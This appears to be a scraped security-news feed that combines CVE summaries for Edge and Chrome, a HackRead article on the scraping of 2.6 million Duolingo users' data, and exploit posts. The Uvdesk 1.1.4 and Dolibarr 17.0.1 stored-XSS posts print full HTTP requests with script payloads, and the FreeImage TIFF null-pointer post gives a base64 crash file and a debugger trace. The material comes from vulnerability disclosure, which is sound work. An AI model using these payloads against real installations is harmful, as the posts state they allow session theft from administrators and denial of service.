An elevation of privilege vulnerability exists in Microsoft browsers allowing sandbox escape. An attacker who successfully exploited the vulnerability could use the sandbox escape to elevate privileges on an affected system.

This vulnerability by itself does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability (such as a remote code execution vulnerability or another elevation of privilege vulnerability) that is capable of leveraging the elevated privileges when code execution is attempted.

CVE-2023-36741: Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability

Uvdesk version 1.1.4 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Uvdesk 1.1.4 - Stored XSS (Authenticated)# Date: 14/08/2023# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://www.uvdesk.com/# Software Link: https://github.com/MegaTKC/AeroCMS# Version: 1.1.4# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23# Authenticated user privilages to tickets. User can send XSS to admin or other user and stolen sesssion.## Example XSS Stored in new ticket-----------------------------------------------------------------------------------------------------------------------Param: reply-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /uvdesk/public/en/member/thread/add/1 HTTP/1.1Host: 127.0.0.1Content-Length: 812Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXCjJcGbgZxZWLsSkUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/uvdesk/public/en/member/ticket/view/1Accept-Encoding: gzip, deflateAccept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Cookie: uv-sidebar=0; PHPSESSID=4b0j3r934245lpssq5lil3edm3Connection: close------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="threadType"forward------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="status"------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="subject"aaaa------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="to[]"test@local.host------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="reply"%3Cp%3E%3Cembed+src%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dH+A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv+MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs+aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw+IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoIlh+TUyIpOzwvc2NyaXB0Pjwvc3ZnPg%3D%3D%22+type%3D%22image%2Fsvg%2Bxml%22+width%3D%22300%22+height%3D%22150%22%3E%3C%2Fembed%3E%3C%2Fp%3E------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="pic"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="nextView"stay------WebKitFormBoundaryXCjJcGbgZxZWLsSk-------------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 302 FoundDate: Mon, 14 Aug 2023 11:33:26 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29X-Powered-By: PHP/7.4.29Cache-Control: max-age=0, must-revalidate, privateLocation: /uvdesk/public/en/member/ticket/view/1Access-Control-Allow-Origin: *Access-Control-Allow-Methods: GET,POST,PUT,OPTIONSAccess-Control-Allow-Headers: Access-Control-Allow-OriginAccess-Control-Allow-Headers: AuthorizationAccess-Control-Allow-Headers: Content-TypeX-Debug-Token: bf1b73X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/bf1b73X-Robots-Tag: noindexExpires: Mon, 14 Aug 2023 11:33:26 GMTSet-Cookie: sf_redirect=%7B%22token%22%3A%22bf1b73%22%2C%22route%22%3A%22helpdesk_member_add_ticket_thread%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22Webkul%5C%5CUVDesk%5C%5CCoreFrameworkBundle%5C%5CController%5C%5CThread%22%2C%22method%22%3A%22saveThread%22%2C%22file%22%3A%22C%3A%5C%5Cxampp2%5C%5Chtdocs%5C%5Cuvdesk%5C%5Cvendor%5C%5Cuvdesk%5C%5Ccore-framework%5C%5CController%5C%5CThread.php%22%2C%22line%22%3A44%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D; path=/; httponly; samesite=laxConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 398<!DOCTYPE html><html>    <head>        <meta charset="UTF-8" />        <meta http-equiv="refresh" content="0;url='/uvdesk/public/en/member/ticket/view/1'" />        <title>Redirecting to /uvdesk/public/en/member/ticket/view/1</title>    </head>    <body>        Redirecting to <a href="/uvdesk/public/en/member/ticket/view/1">/uvdesk/public/en/member/ticket/view/1</a>.    </body></html>-----------------------------------------------------------------------------------------------------------------------Redirect and view response:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Mon, 14 Aug 2023 11:44:14 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29X-Powered-By: PHP/7.4.29Cache-Control: max-age=0, must-revalidate, privateAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: GET,POST,PUT,OPTIONSAccess-Control-Allow-Headers: Access-Control-Allow-OriginAccess-Control-Allow-Headers: AuthorizationAccess-Control-Allow-Headers: Content-TypeX-Debug-Token: 254ce8X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/254ce8X-Robots-Tag: noindexExpires: Mon, 14 Aug 2023 11:44:14 GMTConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 300607<!DOCTYPE html><html>    <head>        <title>#1 vvvvvvvvvvvvvvvvvvvvv</title>[...]<p><embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" width="300" height="150"></embed></p>[...]-----------------------------------------------------------------------------------------------------------------------XSS execute, we can reply ticket to victim. This payload can use in new articles, tickets, all application.

Uvdesk 1.1.4 Cross Site Scripting

By Waqas
Duolingo Investigates Data Leak as Hacker Shares Personal User Information on Hacker Forums and Telegram.
This is a post from HackRead.com Read the original post: API Misuse: Hacker Exposes 2.6M Duolingo Users’ Emails & Names

It is worth noting that Duolingo has not suffered a data breach; the data leak was a result of web scraping through public API abuse.

**KEY FINDINGS**

*   **Extensive User Impact:** The breach affects a substantial user base, with the personal data of over 2.6 million individuals exposed.

*   **Comprehensive Data Set:** The compromised information includes diverse details like usernames, full names, email addresses, countries, language course subscriptions, and account creation dates.

*   **Vulnerable API Exploitation:** The breach was executed through the exploitation of a public API, highlighting the potential risks posed by publicly accessible interfaces.

*   **Data Misuse Concerns:** The breadth of exposed data raises concerns about potential misuse, including identity theft, phishing, and cybercrime targeting affected users.

*   **Heightened Privacy Risks:** Users’ privacy is at stake due to the depth of sensitive data exposed, emphasizing the need for robust cybersecurity measures in safeguarding personal information.

A hacker has recently disclosed the personal information of approximately 2.6 million users of the popular language-learning platform, Duolingo. Contrary to a conventional data breach where hackers infiltrate an organization’s servers, this incident involved the exploitation of a public API.

The hacker, who also serves as a moderator on the Breach Forums, managed to scrape user data in January 2023, leading to the exposure of account-related details for a vast number of Duolingo users.

Duolingo, known for its accessible and engaging language courses, was caught off guard by the incident. The breach, while not originating from a direct assault on Duolingo’s servers or infrastructure, highlights the complex challenges organizations face in safeguarding user information in a hostile and uncertain environment created by threat actors.

**Leaked Data**

Hackread.com has examined and analyzed the exposed data, shedding light on its contents. The dataset encompasses the personal information of a staggering 2,658,787 users. This encompassing collection includes critical details such as:

*   Full names
*   Usernames
*   Email addresses
*   Countries of origin
*   The precise dates of account creation
*   The language courses to which users have subscribed

Notably, the gravity of the breach escalated when, prior to the public leak, another threat actor attempted to sell the same dataset for $1500. The revelation of the data on hacker forums and Telegram channels has only exacerbated concerns regarding user privacy and the potential misuse of exposed information.

Screenshot from the leaked Duolingo data (Image credit: Hackread.com)

Duolingo data leaked and sold on Breach Forums (Image credit: Hackread.com)

Duolingo, in response to the breach, is diligently investigating the situation and has intensified its efforts to secure user data. The incident has catalyzed discussions about the protection of user information in an era where APIs, often considered as open doors to data, require heightened vigilance.

**Impact**

While distinct from a conventional data breach, the exposure of email addresses and full names of 2.6 million Duolingo users still constitutes a significant privacy breach. This incident raises considerable concerns as it exposes individuals to potential risks such as targeted phishing attempts, identity theft, and cyberattacks.

Hackers armed with such specific personal information can craft convincing phishing emails, posing as legitimate entities, to deceive users into sharing further sensitive details or clicking on malicious links.

Moreover, the divulgence of full names can aid cybercriminals in constructing more credible and convincing social engineering schemes, increasing the likelihood of successfully breaching users’ accounts or even conducting scams. As such, even seemingly basic information leaks can lead to severe consequences for affected users.

In an environment where personal data is an invaluable currency, Duolingo data scraping stands as a testament to the ever-evolving methods of hackers and the pressing need for organizations to remain resilient against cyber threats.

As users await the outcome of Duolingo’s investigation, the incident underscores the collective responsibility to maintain digital security and protect user data from falling into the wrong hands.

1.  Hackers leak scraped data of 87,000 GETTR users
2.  A hacker is selling 700 million LinkedIn users accounts
3.  Facebook sues developer of data scraping extensions for Chrome
4.  Facebook sues Ukrainian for scraping and selling 178m users’ data
5.  Data scraping firm leaks 235m Insta, TikTok, YouTube user records

API Misuse: Hacker Exposes 2.6M Duolingo Users’ Emails & Names

Use after free in Vulkan in Google Chrome prior to 116.0.5845.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-4430

Out of bounds memory access in CSS in Google Chrome prior to 116.0.5845.110 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High)

CVE-2023-4428

Out of bounds memory access in Fonts in Google Chrome prior to 116.0.5845.110 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Medium)

CVE-2023-4431

Use after free in Loader in Google Chrome prior to 116.0.5845.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-4429

Out of bounds memory access in V8 in Google Chrome prior to 116.0.5845.110 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High)

CVE-2023-4427

FreeImage before 1.18.0, ReadPalette function in PluginTIFF.cpp is vulnerabile to null pointer dereference.

> tl;dr:  
> When Load TIFF format files, "bitspersample" and "samplesperpixel" are read from file. If the variable biBitCount < 16 witch calc by "bitspersample" and "samplesperpixel", FreeImage will try to write nullptr.

When the program reads a TIFF format file, it will be handed to the Load() function of the 'PluginTIFF.cpp' file. And it will call ReadPalette().  
In ReadPalette function, it call FreeImage\_GetPalette() to get variable "pal", then write to variable "pal" without check.

static void 
ReadPalette(TIFF \*tiff, uint16\_t photometric, uint16\_t bitspersample, FIBITMAP \*dib) {
    RGBQUAD \*pal \= FreeImage\_GetPalette(dib);               // <---- get pal (maybe null)

    switch(photometric) {                                   // <---- write pal every case
        case PHOTOMETRIC\_MINISBLACK:    // bitmap and greyscale image types
        case PHOTOMETRIC\_MINISWHITE:
            // Monochrome image

            if (bitspersample \== 1) {
                if (photometric \== PHOTOMETRIC\_MINISWHITE) {
                    pal\[0\].rgbRed \= pal\[0\].rgbGreen \= pal\[0\].rgbBlue \= 255;         //<---- write
                    pal\[1\].rgbRed \= pal\[1\].rgbGreen \= pal\[1\].rgbBlue \= 0;
                } else {
                    pal\[0\].rgbRed \= pal\[0\].rgbGreen \= pal\[0\].rgbBlue \= 0;          //<---- write
                    pal\[1\].rgbRed \= pal\[1\].rgbGreen \= pal\[1\].rgbBlue \= 255;
                }

            } else if ((bitspersample \== 4) ||(bitspersample \== 8)) {
                // need to build the scale for greyscale images
                int ncolors \= FreeImage\_GetColorsUsed(dib);

                if (photometric \== PHOTOMETRIC\_MINISBLACK) {
                    for (int i \= 0; i < ncolors; i++) {
                        pal\[i\].rgbRed   \=                                        //<---- write
                        pal\[i\].rgbGreen \=
                        pal\[i\].rgbBlue  \= (BYTE)(i\*(255/(ncolors\-1)));
                    }
                } else {
                    for (int i \= 0; i < ncolors; i++) {
                        pal\[i\].rgbRed   \=                                        //<---- write
                        pal\[i\].rgbGreen \=
                        pal\[i\].rgbBlue  \= (BYTE)(255\-i\*(255/(ncolors\-1)));
                    }
                }
            }

            break;

        case PHOTOMETRIC\_PALETTE:   // color map indexed
            uint16\_t \*red;
            uint16\_t \*green;
            uint16\_t \*blue;

            TIFFGetField(tiff, TIFFTAG\_COLORMAP, &red, &green, &blue); 

            // load the palette in the DIB

            if (CheckColormap(1<<bitspersample, red, green, blue) \== 16) {
                for (int i \= (1 << bitspersample) \- 1; i \>= 0; i\--) {
                    pal\[i\].rgbRed \=(BYTE) CVT(red\[i\]);                             //<---- write
                    pal\[i\].rgbGreen \= (BYTE) CVT(green\[i\]);
                    pal\[i\].rgbBlue \= (BYTE) CVT(blue\[i\]);
                }
            } else {
                for (int i \= (1 << bitspersample) \- 1; i \>= 0; i\--) {
                    pal\[i\].rgbRed \= (BYTE) red\[i\];                                 //<---- write
                    pal\[i\].rgbGreen \= (BYTE) green\[i\];
                    pal\[i\].rgbBlue \= (BYTE) blue\[i\];
                }
            }

            break;
    }
}

function FreeImage\_GetPalette() maybe return NULL.

FreeImage\_GetPalette(FIBITMAP \*dib) {
    return (dib && FreeImage\_GetBPP(dib) < 16) ? (RGBQUAD \*)(((BYTE \*)FreeImage\_GetInfoHeader(dib)) + sizeof(BITMAPINFOHEADER)) : NULL;
}

unsigned DLL\_CALLCONV
FreeImage\_GetBPP(FIBITMAP \*dib) {
    return dib ? FreeImage\_GetInfoHeader(dib)\->biBitCount : 0;
}

Variable biBitCount is calc by "bitspersample" and "samplesperpixel" in function "CreateImageType", and these two variable are read from file.  
So if variable biBitCount less than 16, FreeImage will try to write nullptr. It allows an attacker to cause Denial of Service.

windbg:

ModLoad: 10000000 105ee000   D:\\temp\\\_zzz\\FreeImage.dll
ModLoad: 752b0000 752c4000   C:\\Windows\\SysWOW64\\VCRUNTIME140.dll
ModLoad: 755e0000 75643000   C:\\Windows\\SysWOW64\\WS2\_32.dll
ModLoad: 77050000 7710f000   C:\\Windows\\SysWOW64\\RPCRT4.dll
(17dc.5d5c): Break instruction exception \- code 80000003 (first chance)
eax\=00000000 ebx\=00000000 ecx\=2b110000 edx\=00000000 esi\=77442044 edi\=7744260c
eip\=774e1b72 esp\=0095f420 ebp\=0095f44c iopl\=0         nv up ei pl zr na pe nc
cs\=0023  ss\=002b  ds\=002b  es\=002b  fs\=0053  gs\=002b             efl\=00000246
ntdll!LdrpDoDebuggerBreak+0x2b:
774e1b72 cc              int     3
0:000\> g
(17dc.5d5c): Access violation \- code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
\*\*\* WARNING: Unable to verify checksum for D:\\temp\\\_zzz\\FreeImage.dll
eax\=000000ff ebx\=069ceff8 ecx\=00000000 edx\=00000000 esi\=00000000 edi\=00000000
eip\=10034fbc esp\=0095f63c ebp\=00000000 iopl\=0         nv up ei pl zr na pe nc
cs\=0023  ss\=002b  ds\=002b  es\=002b  fs\=0053  gs\=002b             efl\=00010246
FreeImage!\_TIFFmemcmp+0x3fc:
10034fbc 884500          mov     byte ptr \[ebp\],al          ss:002b:00000000\=??
0:000\> kv
 \# ChildEBP RetAddr      Args to Child
00 0095f658 10037780     00000001 00000010 06982fc8 FreeImage!\_TIFFmemcmp+0x3fc (FPO: \[Uses EBP\] \[2,5,4\])
01 0095f8a0 1000d9de     0095f8f4 06982fc8 00000010 FreeImage!\_TIFFmemcmp+0x2bc0 (FPO: \[5,139,3\])
02 0095f8d4 1000da60     00000012 0095f8f4 06982fc8 FreeImage!FreeImage\_LoadFromHandle+0x8e (FPO: \[Uses EBP\] \[4,3,2\])
03 0095f900 00b0107b     00000012 0697efee 00000000 FreeImage!FreeImage\_Load+0x50 (FPO: \[3,4,2\])

TestFile:

data:image/tiff;base64,SUkqAAgAAAAHAAABAwABAAAAIAAAAAEBAwABAAAAIAAAABcBBAAMAAAACAAAABEBBAAEAAAACAAAABYBAwABAAAAAAQAABUBAwABAAAAEAAAAEMBAwABAAAAAQAAAAAAAAA\=

CVE-2021-40266: FreeImage / Bugs / #334 A NULL pointer dereference exists in function ReadPalette() located in PluginTIFF.cpp

Dolibarr version 17.0.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Dolibarr Version 17.0.1 - Stored XSS# Dork: # Date: 2023-08-09# Exploit Author: Furkan Karaarslan# Category : Webapps# Vendor Homepage: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php# Version: 17.0.1 (REQUIRED)# Tested on: Windows/Linux# CVE : -----------------------------------------------------------------------------RequestsPOST /dolibarr-17.0.1/htdocs/user/note.php HTTP/1.1Host: 127.0.0.1Content-Length: 599Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php?action=editnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1Accept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: 5c8ccd93504819395bd9eb83add769eb=g6sujc3ss8cj53cvk84qv0jgol; f758a1cd0925196cd7746824e3df122b=u04rsmdqgrdpr2kduo49gl0rmh; DOLSESSID_18109f368bbc82f2433d1d6c639db71bb97e2bd1=sud22bsu9sbqqc4bgcloki2ehtConnection: closetoken=4b1479ad024e82d298b395bfab9b1916&action=setnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1&note_public=%3Ca+onscrollend%3Dalert%281%29+style%3D%22display%3Ablock%3Boverflow%3Aauto%3Bborder%3A1px+dashed%3Bwidth%3A500px%3Bheight%3A100px%3B%22%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cspan+id%3Dx%3Etest%3C%2Fspan%3E%3C%2Fa%3E&modify=De%C4%9Fi%C5%9Ftir

Tag

#chrome